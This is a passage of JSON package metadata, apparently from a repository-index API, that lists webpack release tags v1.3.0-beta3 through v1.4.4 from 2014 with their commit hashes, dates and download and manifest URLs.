"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":nul